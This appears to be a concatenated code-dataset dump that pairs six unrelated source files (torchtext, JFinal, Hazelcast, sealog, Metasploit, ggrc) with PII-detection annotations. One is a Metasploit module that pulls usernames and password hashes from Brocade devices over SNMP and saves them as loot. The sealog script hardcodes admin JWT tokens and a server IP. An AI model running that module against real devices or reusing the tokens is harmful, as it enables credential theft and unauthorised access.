[{"tag": "EMAIL", "value": "user1@test.com", "start": 1086, "end": 1100, "context": " username=\"someuser1\",\n email=\"user1@test.com\",\n password=\"secret_password1\",\n "}, {"tag": "USERNAME", "value": "someuser", "start": 767, "end": 775, "context": "user = User.objects.create(\n username=\"someuser\",\n email=\"user@test.com\",\n "}, {"tag": "USERNAME", "value": "someuser1", "start": 1055, "end": 1064, "context": "ser1 = User.objects.create(\n username=\"someuser1\",\n email=\"user1@test.com\",\n "}, {"tag": "EMAIL", "value": "user@test.com", "start": 936, "end": 949, "context": "bjects.create(\n user=self.user, email=\"user@test.com\", primary=True, verified=True\n )\n\n "}, {"tag": "PASSWORD", "value": "secret_password1", "start": 1125, "end": 1141, "context": " email=\"user1@test.com\",\n password=\"secret_password1\",\n )\n\n EmailAddress.objects.create("}, {"tag": "EMAIL", "value": "user@test.com", "start": 797, "end": 810, "context": " username=\"someuser\",\n email=\"user@test.com\",\n password=\"secret_password\",\n "}, {"tag": "PASSWORD", "value": "secret_password", "start": 835, "end": 850, "context": " email=\"user@test.com\",\n password=\"secret_password\",\n )\n\n EmailAddress.objects.create("}, {"tag": "EMAIL", "value": "user1@test.com", "start": 1240, "end": 1254, "context": "(\n user=self.user1,\n email=\"user1@test.com\",\n primary=True,\n verified="}]
|
[{"tag": "EMAIL", "value": "user1@test.com", "start": 1086, "end": 1100, "context": " username=\"someuser1\",\n email=\"user1@test.com\",\n password=\"secret_password1\",\n "}, {"tag": "USERNAME", "value": "someuser", "start": 767, "end": 775, "context": "user = User.objects.create(\n username=\"someuser\",\n email=\"user@test.com\",\n "}, {"tag": "USERNAME", "value": "someuser1", "start": 1055, "end": 1064, "context": "ser1 = User.objects.create(\n username=\"someuser1\",\n email=\"user1@test.com\",\n "}, {"tag": "EMAIL", "value": "user@test.com", "start": 936, "end": 949, "context": "bjects.create(\n user=self.user, email=\"user@test.com\", primary=True, verified=True\n )\n\n "}, {"tag": "PASSWORD", "value": "secret_password1", "start": 1125, "end": 1141, "context": " email=\"user1@test.com\",\n password=\"secret_password1\",\n )\n\n EmailAddress.objects.create("}, {"tag": "EMAIL", "value": "user@test.com", "start": 797, "end": 810, "context": " username=\"someuser\",\n email=\"user@test.com\",\n password=\"secret_password\",\n "}, {"tag": "PASSWORD", "value": "secret_password", "start": 835, "end": 850, "context": " email=\"user@test.com\",\n password=\"secret_password\",\n )\n\n EmailAddress.objects.create("}, {"tag": "EMAIL", "value": "user1@test.com", "start": 1240, "end": 1254, "context": "(\n user=self.user1,\n email=\"user1@test.com\",\n primary=True,\n verified="}]
|
import os
from typing import Union, Tuple
from torchtext._internal.module_utils import is_module_available
from torchtext.data.datasets_utils import (
_wrap_split_argument,
_create_dataset_directory,
)
if is_module_available("torchdata"):
from torchdata.datapipes.iter import FileOpener, GDriveReader, IterableWrapper
URL = "https://drive.google.com/uc?export=download&id=0Bz8a_Dbh9QhbaW12WVVZS2drcnM"
MD5 = "fe39f8b653cada45afd5792e0f0e8f9b"
NUM_LINES = {
"train": 3600000,
"test": 400000,
}
_PATH = "amazon_review_polarity_csv.tar.gz"
_EXTRACTED_FILES = {
"train": os.path.join("amazon_review_polarity_csv", "train.csv"),
"test": os.path.join("amazon_review_polarity_csv", "test.csv"),
}
DATASET_NAME = "AmazonReviewPolarity"
@_create_dataset_directory(dataset_name=DATASET_NAME)
@_wrap_split_argument(("train", "test"))
def AmazonReviewPolarity(root: str, split: Union[Tuple[str], str]):
"""AmazonReviewPolarity Dataset
For additional details refer to https://arxiv.org/abs/1509.01626
Number of lines per split:
- train: 3600000
- test: 400000
Args:
root: Directory where the datasets are saved. Default: os.path.expanduser('~/.torchtext/cache')
split: split or splits to be returned. Can be a string or tuple of strings. Default: (`train`, `test`)
:returns: DataPipe that yields tuple of label (1 to 2) and text containing the review title and text
:rtype: (int, str)
"""
# TODO Remove this after removing conditional dependency
if not is_module_available("torchdata"):
raise ModuleNotFoundError(
"Package `torchdata` not found. Please install following instructions at `https://github.com/pytorch/data`"
)
url_dp = IterableWrapper([URL])
cache_compressed_dp = url_dp.on_disk_cache(
filepath_fn=lambda x: os.path.join(root, _PATH),
hash_dict={os.path.join(root, _PATH): MD5},
hash_type="md5",
)
cache_compressed_dp = GDriveReader(cache_compressed_dp).end_caching(mode="wb", same_filepath_fn=True)
cache_decompressed_dp = cache_compressed_dp.on_disk_cache(
filepath_fn=lambda x: os.path.join(root, _EXTRACTED_FILES[split])
)
cache_decompressed_dp = (
FileOpener(cache_decompressed_dp, mode="b").read_from_tar().filter(lambda x: _EXTRACTED_FILES[split] in x[0])
)
cache_decompressed_dp = cache_decompressed_dp.end_caching(mode="wb", same_filepath_fn=True)
data_dp = FileOpener(cache_decompressed_dp, encoding="utf-8")
return data_dp.parse_csv().map(fn=lambda t: (int(t[0]), " ".join(t[1:])))
|
Python
|
BSD-3-Clause
|
abhinavarora/text/torchtext/datasets/amazonreviewpolarity.py
|
ab9240e5-2736-4857-ac7c-fa9769d730c3
|
[]
|
[]
|
/**
* Copyright (c) 2011-2021, James Zhan 詹波 (jfinal@126.com).
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.jfinal.kit;
import java.util.HashMap;
import java.util.Map;
import com.jfinal.json.Json;
/**
* Ret 用于返回值封装,也用于服务端与客户端的 json 数据通信
*
* <pre>
* 一、主要应用场景:
* 1:业务层需要返回多个返回值,例如要返回业务状态以及数据
* 2:renderJson(ret) 响应 json 数据给客户端
*
* 二、实例
* 1:服务端
* Ret ret = service.justDoIt(paras);
* renderJson(ret);
*
* 2:javascript 客户端 ajax 回调函数通常这么用:
* success: function(ret) {
* if(ret.state == "ok") {
* ...
* }
*
* if (ret.state == "fail") {
* ...
* }
* }
*
* 3:普通应用程序通常这么用:
* String json = HttpKit.readData(getRequest());
* Ret ret = FastJson.getJson().parse(json, Ret.class);
* if (ret.isOk()) {
* ...
* }
*
* if (ret.isFail()) {
* ...
* }
*
* 三、定制 Ret
* 1:将状态字段名由 "state" 改为 "success",将状态值 "ok" 改为 true、"fail" 改为 false
* CPI.setRetState("success", true, false);
*
* 2:将状态字段名由 "state" 改为 "code",将状态值 "ok" 改为 200、"fail" 改为 500
* CPI.setRetState("code", 200, 500);
*
* 3:将消息字段名由 "msg" 改为 "message"
* CPI.setRetMsg("message")
* </pre>
*/
@SuppressWarnings({"rawtypes", "unchecked"})
public class Ret extends HashMap {
private static final long serialVersionUID = -3021472182023759198L;
static String STATE = "state";
static Object STATE_OK = "ok";
static Object STATE_FAIL = "fail";
static String MSG = "msg";
public Ret() {
}
public static Ret by(Object key, Object value) {
return new Ret().set(key, value);
}
public static Ret create(Object key, Object value) {
return new Ret().set(key, value);
}
public static Ret create() {
return new Ret();
}
public static Ret ok() {
return new Ret().setOk();
}
public static Ret ok(Object key, Object value) {
return ok().set(key, value);
}
public static Ret ok(String msg) {
return ok().set(MSG, msg);
}
public static Ret fail() {
return new Ret().setFail();
}
public static Ret fail(Object key, Object value) {
return fail().set(key, value);
}
public static Ret fail(String msg) {
return fail().set(MSG, msg);
}
public Ret setOk() {
super.put(STATE, STATE_OK);
return this;
}
public Ret setFail() {
super.put(STATE, STATE_FAIL);
return this;
}
public boolean isOk() {
Object state = get(STATE);
if (STATE_OK.equals(state)) {
return true;
}
if (STATE_FAIL.equals(state)) {
return false;
}
throw new IllegalStateException("调用 isOk() 之前,必须先调用 ok()、fail() 或者 setOk()、setFail() 方法");
}
public boolean isFail() {
Object state = get(STATE);
if (STATE_FAIL.equals(state)) {
return true;
}
if (STATE_OK.equals(state)) {
return false;
}
throw new IllegalStateException("调用 isFail() 之前,必须先调用 ok()、fail() 或者 setOk()、setFail() 方法");
}
public Ret set(Object key, Object value) {
super.put(key, value);
return this;
}
public Ret setIfNotBlank(Object key, String value) {
if (StrKit.notBlank(value)) {
set(key, value);
}
return this;
}
public Ret setIfNotNull(Object key, Object value) {
if (value != null) {
set(key, value);
}
return this;
}
public Ret set(Map map) {
super.putAll(map);
return this;
}
public Ret set(Ret ret) {
super.putAll(ret);
return this;
}
public Ret delete(Object key) {
super.remove(key);
return this;
}
public <T> T getAs(Object key) {
return (T)get(key);
}
public String getStr(Object key) {
Object s = get(key);
return s != null ? s.toString() : null;
}
public Integer getInt(Object key) {
Number n = (Number)get(key);
return n != null ? n.intValue() : null;
}
public Long getLong(Object key) {
Number n = (Number)get(key);
return n != null ? n.longValue() : null;
}
public Double getDouble(Object key) {
Number n = (Number)get(key);
return n != null ? n.doubleValue() : null;
}
public Float getFloat(Object key) {
Number n = (Number)get(key);
return n != null ? n.floatValue() : null;
}
public Number getNumber(Object key) {
return (Number)get(key);
}
public Boolean getBoolean(Object key) {
return (Boolean)get(key);
}
/**
* key 存在,并且 value 不为 null
*/
public boolean notNull(Object key) {
return get(key) != null;
}
/**
* key 不存在,或者 key 存在但 value 为null
*/
public boolean isNull(Object key) {
return get(key) == null;
}
/**
* key 存在,并且 value 为 true,则返回 true
*/
public boolean isTrue(Object key) {
Object value = get(key);
return (value instanceof Boolean && ((Boolean)value == true));
}
/**
* key 存在,并且 value 为 false,则返回 true
*/
public boolean isFalse(Object key) {
Object value = get(key);
return (value instanceof Boolean && ((Boolean)value == false));
}
public String toJson() {
return Json.getJson().toJson(this);
}
public boolean equals(Object ret) {
return ret instanceof Ret && super.equals(ret);
}
}
|
Java
|
Apache-2.0
|
Sople/jfinal/src/main/java/com/jfinal/kit/Ret.java
|
c4789b83-4ae5-4709-950d-eb736ba0dea3
|
[{"tag": "NAME", "value": "James Zhan", "start": 33, "end": 43, "context": "/**\r\n * Copyright (c) 2011-2021, James Zhan \u8a79\u6ce2 (jfinal@126.com).\r\n *\r\n * Licensed under the A"}, {"tag": "EMAIL", "value": "jfinal@126.com", "start": 48, "end": 62, "context": "/**\r\n * Copyright (c) 2011-2021, James Zhan \u8a79\u6ce2 (jfinal@126.com).\r\n *\r\n * Licensed under the Apache License, Vers"}]
|
[{"tag": "NAME", "value": "James Zhan", "start": 33, "end": 43, "context": "/**\r\n * Copyright (c) 2011-2021, James Zhan \u8a79\u6ce2 (jfinal@126.com).\r\n *\r\n * Licensed under the A"}, {"tag": "EMAIL", "value": "jfinal@126.com", "start": 48, "end": 62, "context": "/**\r\n * Copyright (c) 2011-2021, James Zhan \u8a79\u6ce2 (jfinal@126.com).\r\n *\r\n * Licensed under the Apache License, Vers"}]
|
/*
* Copyright (c) 2008-2020, Hazelcast, Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.hazelcast.client.impl.protocol.codec;
import com.hazelcast.client.impl.protocol.ClientMessage;
import com.hazelcast.client.impl.protocol.Generated;
import com.hazelcast.client.impl.protocol.codec.builtin.*;
import com.hazelcast.client.impl.protocol.codec.custom.*;
import javax.annotation.Nullable;
import static com.hazelcast.client.impl.protocol.ClientMessage.*;
import static com.hazelcast.client.impl.protocol.codec.builtin.FixedSizeTypesCodec.*;
/*
* This file is auto-generated by the Hazelcast Client Protocol Code Generator.
* To change this file, edit the templates or the protocol
* definitions on the https://github.com/hazelcast/hazelcast-client-protocol
* and regenerate it.
*/
/**
* Checks the lock for the specified key.If the lock is acquired then returns true, else returns false.
*/
@Generated("306071f9db7b2ab1e92edc63a77973c7")
public final class MapIsLockedCodec {
//hex: 0x011200
public static final int REQUEST_MESSAGE_TYPE = 70144;
//hex: 0x011201
public static final int RESPONSE_MESSAGE_TYPE = 70145;
private static final int REQUEST_INITIAL_FRAME_SIZE = PARTITION_ID_FIELD_OFFSET + INT_SIZE_IN_BYTES;
private static final int RESPONSE_RESPONSE_FIELD_OFFSET = RESPONSE_BACKUP_ACKS_FIELD_OFFSET + BYTE_SIZE_IN_BYTES;
private static final int RESPONSE_INITIAL_FRAME_SIZE = RESPONSE_RESPONSE_FIELD_OFFSET + BOOLEAN_SIZE_IN_BYTES;
private MapIsLockedCodec() {
}
@edu.umd.cs.findbugs.annotations.SuppressFBWarnings({"URF_UNREAD_PUBLIC_OR_PROTECTED_FIELD"})
public static class RequestParameters {
/**
* name of map
*/
public java.lang.String name;
/**
* Key for the map entry to check if it is locked.
*/
public com.hazelcast.internal.serialization.Data key;
}
public static ClientMessage encodeRequest(java.lang.String name, com.hazelcast.internal.serialization.Data key) {
ClientMessage clientMessage = ClientMessage.createForEncode();
clientMessage.setRetryable(true);
clientMessage.setOperationName("Map.IsLocked");
ClientMessage.Frame initialFrame = new ClientMessage.Frame(new byte[REQUEST_INITIAL_FRAME_SIZE], UNFRAGMENTED_MESSAGE);
encodeInt(initialFrame.content, TYPE_FIELD_OFFSET, REQUEST_MESSAGE_TYPE);
encodeInt(initialFrame.content, PARTITION_ID_FIELD_OFFSET, -1);
clientMessage.add(initialFrame);
StringCodec.encode(clientMessage, name);
DataCodec.encode(clientMessage, key);
return clientMessage;
}
public static MapIsLockedCodec.RequestParameters decodeRequest(ClientMessage clientMessage) {
ClientMessage.ForwardFrameIterator iterator = clientMessage.frameIterator();
RequestParameters request = new RequestParameters();
//empty initial frame
iterator.next();
request.name = StringCodec.decode(iterator);
request.key = DataCodec.decode(iterator);
return request;
}
@edu.umd.cs.findbugs.annotations.SuppressFBWarnings({"URF_UNREAD_PUBLIC_OR_PROTECTED_FIELD"})
public static class ResponseParameters {
/**
* Returns true if the entry is locked, otherwise returns false
*/
public boolean response;
}
public static ClientMessage encodeResponse(boolean response) {
ClientMessage clientMessage = ClientMessage.createForEncode();
ClientMessage.Frame initialFrame = new ClientMessage.Frame(new byte[RESPONSE_INITIAL_FRAME_SIZE], UNFRAGMENTED_MESSAGE);
encodeInt(initialFrame.content, TYPE_FIELD_OFFSET, RESPONSE_MESSAGE_TYPE);
encodeBoolean(initialFrame.content, RESPONSE_RESPONSE_FIELD_OFFSET, response);
clientMessage.add(initialFrame);
return clientMessage;
}
public static MapIsLockedCodec.ResponseParameters decodeResponse(ClientMessage clientMessage) {
ClientMessage.ForwardFrameIterator iterator = clientMessage.frameIterator();
ResponseParameters response = new ResponseParameters();
ClientMessage.Frame initialFrame = iterator.next();
response.response = decodeBoolean(initialFrame.content, RESPONSE_RESPONSE_FIELD_OFFSET);
return response;
}
}
|
Java
|
Apache-2.0
|
Andu033/hazelcast/hazelcast/src/main/java/com/hazelcast/client/impl/protocol/codec/MapIsLockedCodec.java
|
da5db584-ec62-4776-9d0f-73963c5594a4
|
[{"tag": "API_KEY", "value": "306071f9db7b2ab1e92edc63a77973c7", "start": 1464, "end": 1496, "context": "returns true, else returns false.\n */\n@Generated(\"306071f9db7b2ab1e92edc63a77973c7\")\npublic final class MapIsLockedCodec {\n //hex"}]
|
[{"tag": "KEY", "value": "306071f9db7b2ab1e92edc63a77973c7", "start": 1464, "end": 1496, "context": "returns true, else returns false.\n */\n@Generated(\"306071f9db7b2ab1e92edc63a77973c7\")\npublic final class MapIsLockedCodec {\n //hex"}]
|
#!/usr/bin/env python3
# still in development
#
import asyncio
import websockets
import json
import requests
eventsAPIPath = '/api/v1/events'
localServerIP = '0.0.0.0'
localServerAPIPort = '8000'
localServerWSPort = '8000'
localServerPath = '/sealog-server'
localToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc'
localClientWSID = 'localSealogReceive'
remoteServerIP = '162.243.201.175'
remoteServerAPIPort = '80'
remoteServerWSPort = '8000'
remoteServerPath = '/sealog-server'
remoteToken = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk"
remoteClientWSID = 'remoteSealogReceive'
hello = {
'type': 'hello',
'id': remoteClientWSID,
'auth': {
'headers': {
'authorization': remoteToken
}
},
'version': '2',
'subs': ['/ws/status/newEvents']
}
ping = {
'type':'ping',
'id':remoteClientWSID
}
localHeaders = {'authorization': localToken}
remoteHeaders = {'authorization': remoteToken}
async def eventlog():
try:
async with websockets.connect('ws://' + remoteServerIP + ':' + remoteServerWSPort) as websocket:
await websocket.send(json.dumps(hello))
while(True):
event = await websocket.recv()
eventObj = json.loads(event)
print("eventObj:", eventObj)
if eventObj['type'] and eventObj['type'] == 'ping':
await websocket.send(json.dumps(ping))
elif eventObj['type'] and eventObj['type'] == 'pub':
r = requests.post('http://' + localServerIP + ':' + localServerAPIPort + localServerPath + eventsAPIPath, headers=localHeaders, data = json.dumps(eventObj['message']))
print(r.text)
### end of repeat
except Exception as error:
print(error)
asyncio.get_event_loop().run_until_complete(eventlog())
|
Python
|
MIT
|
OceanDataTools/sealog-server/misc/sealog_repeater_receive.py
|
c0ff97b6-b374-42cb-9473-9bec3a0b42c8
|
[{"tag": "IP_ADDRESS", "value": "162.243.201.175", "start": 571, "end": 586, "context": "entWSID = 'localSealogReceive'\n\nremoteServerIP = '162.243.201.175'\nremoteServerAPIPort = '80'\nremoteServerWSPort = "}, {"tag": "API_KEY", "value": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc", "start": 276, "end": 511, "context": "\nlocalServerPath = '/sealog-server'\nlocalToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc'\nlocalClientWSID = 'localSealogReceive'\n\nremoteSe"}, {"tag": "API_KEY", "value": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk", "start": 694, "end": 929, "context": "emoteServerPath = '/sealog-server'\nremoteToken = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk\"\nremoteClientWSID = 'remoteSealogReceive'\n\nhello "}, {"tag": "IP_ADDRESS", "value": "0.0.0.0", "start": 163, "end": 170, "context": "ventsAPIPath = '/api/v1/events'\n\nlocalServerIP = '0.0.0.0'\nlocalServerAPIPort = '8000'\nlocalServerWSPort = "}]
|
[{"tag": "IP_ADDRESS", "value": "162.243.201.175", "start": 571, "end": 586, "context": "entWSID = 'localSealogReceive'\n\nremoteServerIP = '162.243.201.175'\nremoteServerAPIPort = '80'\nremoteServerWSPort = "}, {"tag": "KEY", "value": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc", "start": 276, "end": 511, "context": "\nlocalServerPath = '/sealog-server'\nlocalToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc'\nlocalClientWSID = 'localSealogReceive'\n\nremoteSe"}, {"tag": "KEY", "value": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk", "start": 694, "end": 929, "context": "emoteServerPath = '/sealog-server'\nremoteToken = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk\"\nremoteClientWSID = 'remoteSealogReceive'\n\nhello "}, {"tag": "IP_ADDRESS", "value": "0.0.0.0", "start": 163, "end": 170, "context": "ventsAPIPath = '/api/v1/events'\n\nlocalServerIP = '0.0.0.0'\nlocalServerAPIPort = '8000'\nlocalServerWSPort = "}]
|
#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Brocade Password Hash Enumeration',
'Description' => %q{
This module extracts password hashes from certain Brocade load
balancer devices.
},
'References' =>
[
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
],
'Author' => ['Deral "PercentX" Heiland'],
'License' => MSF_LICENSE
)
end
def run_host(ip)
begin
snmp = connect_snmp
if snmp.get_value('sysDescr.0') =~ /Brocade/
@users = []
snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.1") do |row|
row.each { |val| @users << val.value.to_s }
end
@hashes = []
snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.2") do |row|
row.each { |val| @hashes << val.value.to_s }
end
print_good("#{ip} - Found user and password hashes:")
end
credinfo = ""
@users.each_index do |i|
credinfo << "#{@users[i]}:#{@hashes[i]}" << "\n"
print_good("#{@users[i]}:#{@hashes[i]}")
end
#Woot we got loot.
loot_name = "brocade.hashes"
loot_type = "text/plain"
loot_filename = "brocade_hashes.txt"
loot_desc = "Brodace username and password hashes"
p = store_loot(loot_name, loot_type, datastore['RHOST'], credinfo , loot_filename, loot_desc)
print_status("Credentials saved: #{p}")
rescue ::SNMP::UnsupportedVersion
rescue ::SNMP::RequestTimeout
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} - Error: #{e.class} #{e}")
disconnect_snmp
end
end
end
|
Ruby
|
Apache-2.0
|
4kux/metasploit-framework/modules/auxiliary/scanner/snmp/brocade_enumhash.rb
|
9dec7ead-762c-458f-9dd8-b4e30b229acb
|
[]
|
[]
|
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: david@reciprocitylabs.com
# Maintained By: david@reciprocitylabs.com
import re
from sqlalchemy.orm import validates
from ggrc import db
from ggrc import settings
from ggrc.models.computed_property import computed_property
from ggrc.models.context import HasOwnContext
from ggrc.models.exceptions import ValidationError
from ggrc.models.mixins import deferred, Base, CustomAttributable
from ggrc.models.reflection import PublishOnly
from ggrc.models.relationship import Relatable
from ggrc.models.utils import validate_option
class Person(CustomAttributable, HasOwnContext, Relatable, Base, db.Model):
__tablename__ = 'people'
email = deferred(db.Column(db.String, nullable=False), 'Person')
name = deferred(db.Column(db.String), 'Person')
language_id = deferred(db.Column(db.Integer), 'Person')
company = deferred(db.Column(db.String), 'Person')
object_people = db.relationship(
'ObjectPerson', backref='person', cascade='all, delete-orphan')
object_owners = db.relationship(
'ObjectOwner', backref='person', cascade='all, delete-orphan')
language = db.relationship(
'Option',
primaryjoin='and_(foreign(Person.language_id) == Option.id, '
'Option.role == "person_language")',
uselist=False,
)
@staticmethod
def _extra_table_args(cls):
return (
db.Index('ix_people_name_email', 'name', 'email'),
db.Index('uq_people_email', 'email', unique=True),
)
_fulltext_attrs = [
'company',
'email',
'name',
]
_publish_attrs = [
'company',
'email',
'language',
'name',
PublishOnly('object_people'),
PublishOnly('system_wide_role'),
]
_sanitize_html = [
'company',
'name',
]
_include_links = []
_aliases = {
"name": "Name",
"email": {
"display_name": "Email",
"unique": True,
},
"company": "Company",
"user_role": {
"display_name": "Role",
"type": "user_role",
"filter_by": "_filter_by_user_role",
},
}
@classmethod
def _filter_by_user_role(cls, predicate):
from ggrc_basic_permissions.models import Role, UserRole
return UserRole.query.join(Role).filter(
(UserRole.person_id == cls.id) &
(UserRole.context_id == None) &
predicate(Role.name)
).exists()
# Methods required by Flask-Login
def is_authenticated(self):
return True
def is_active(self):
return True # self.active
def is_anonymous(self):
return False
def get_id(self):
return unicode(self.id) # noqa
@validates('language')
def validate_person_options(self, key, option):
return validate_option(self.__class__.__name__, key, option,
'person_language')
@validates('email')
def validate_email(self, key, email):
if not Person.is_valid_email(email):
message = "Must provide a valid email address"
raise ValidationError(message)
return email
@staticmethod
def is_valid_email(val):
# Borrowed from Django
# literal form, ipv4 address (SMTP 4.1.3)
email_re = re.compile(
'^[-!#$%&\'*+\\.\/0-9=?A-Z^_`{|}~]+@([-0-9A-Z]+\.)+([0-9A-Z]){2,4}$',
re.IGNORECASE)
return email_re.match(val) if val else False
@classmethod
def eager_query(cls):
from sqlalchemy import orm
# query = super(Person, cls).eager_query()
# Completely overriding eager_query to avoid eager loading of the
# modified_by relationship
return super(Person, cls).eager_query().options(
orm.joinedload('language'),
orm.subqueryload('object_people'),
)
def _display_name(self):
return self.email
@computed_property
def system_wide_role(self):
"""For choosing the role string to show to the user; of all the roles in
the system-wide context, it shows the highest ranked one (if there are
multiple) or "No Access" if there are none.
"""
# FIXME: This method should be in `ggrc_basic_permissions`, since it
# depends on `Role` and `UserRole` objects
if self.email in getattr(settings, "BOOTSTRAP_ADMIN_USERS", []):
return u"Superuser"
ROLE_HIERARCHY = {
u'gGRC Admin': 0,
u'Editor': 1,
u'Reader': 2,
u'Creator': 3,
}
system_wide_roles = ROLE_HIERARCHY.keys()
unique_roles = set([
user_role.role.name
for user_role in self.user_roles
if user_role.role.name in system_wide_roles
])
if len(unique_roles) == 0:
return u"No Access"
else:
# -1 as default to make items not in this list appear on top
# and thus shown to the user
sorted_roles = sorted(unique_roles,
key=lambda x: ROLE_HIERARCHY.get(x, -1))
return sorted_roles[0]
|
Python
|
ECL-2.0
|
mikecb/ggrc-core/src/ggrc/models/person.py
|
66181c13-bbd3-4c09-a245-2c82b7f0fe6f
|
[{"tag": "EMAIL", "value": "david@reciprocitylabs.com", "start": 172, "end": 197, "context": "nses/LICENSE-2.0 <see LICENSE file>\n# Created By: david@reciprocitylabs.com\n# Maintained By: david@reciprocitylabs.com\n\nimpor"}, {"tag": "EMAIL", "value": "david@reciprocitylabs.com", "start": 215, "end": 240, "context": "ed By: david@reciprocitylabs.com\n# Maintained By: david@reciprocitylabs.com\n\nimport re\nfrom sqlalchemy.orm import validates\n\n"}]
|
